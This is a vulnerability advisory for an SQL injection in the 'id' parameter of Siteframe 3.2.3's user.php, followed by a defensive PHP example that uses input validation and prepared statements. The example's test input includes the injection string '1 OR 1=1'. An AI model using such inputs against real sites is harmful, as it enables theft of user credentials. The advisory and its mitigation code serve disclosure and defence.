Vendor: Siteframe
By: AnGrY BoY
CVSS: 7.5 (HIGH)
Type: SQL Injection
CWE: 89
Product Name: Siteframe
Affected Version From: 3.2.3
Affected Version To: 3.2.3
Patch Exists: NO
Related CWE: N/A
CPE: a:siteframe:siteframe
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows SP2
2010
Siteframe ‘user.php’ SQL Injection Vulnerability
An attacker can exploit this vulnerability by sending a malicious SQL query to the vulnerable parameter 'id' in the 'user.php' file. The malicious query will allow the attacker to extract sensitive information from the database such as user emails and passwords.
Mitigation:
Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.
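One way to apply this mitigation to an `id` parameter like the one in `user.php`, shown as an added example that is not Siteframe's own code: the value is validated as a positive integer and then bound to a prepared statement instead of being concatenated into the query. The `users` table, its columns and the function names are assumptions, and the sample row is constructed.

```php
<?php
// Added example: hypothetical handler for the `id` parameter of a user.php-style page.
// Table, column and function names are assumptions; Siteframe's schema is not shown here.

function parse_user_id($raw): ?int
{
    // Accept only a positive decimal integer; anything else is rejected outright.
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

function fetch_user(PDO $db, $rawId): ?array
{
    $id = parse_user_id($rawId);
    if ($id === null) {
        return null; // caller should answer with 400 Bad Request
    }
    // The value is bound as an integer and never becomes part of the SQL text.
    // Only the columns the page needs are selected, so email and password
    // are not returned even to a legitimate request.
    $stmt = $db->prepare('SELECT id, name FROM users WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed sample data in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, email TEXT, password TEXT)');
$db->exec("INSERT INTO users VALUES (1, 'alice', 'alice@example.test', 'hash-placeholder')");

// A well-formed id is looked up; input carrying SQL syntax fails validation.
var_dump(fetch_user($db, '1'));
var_dump(fetch_user($db, '1 OR 1=1'));
```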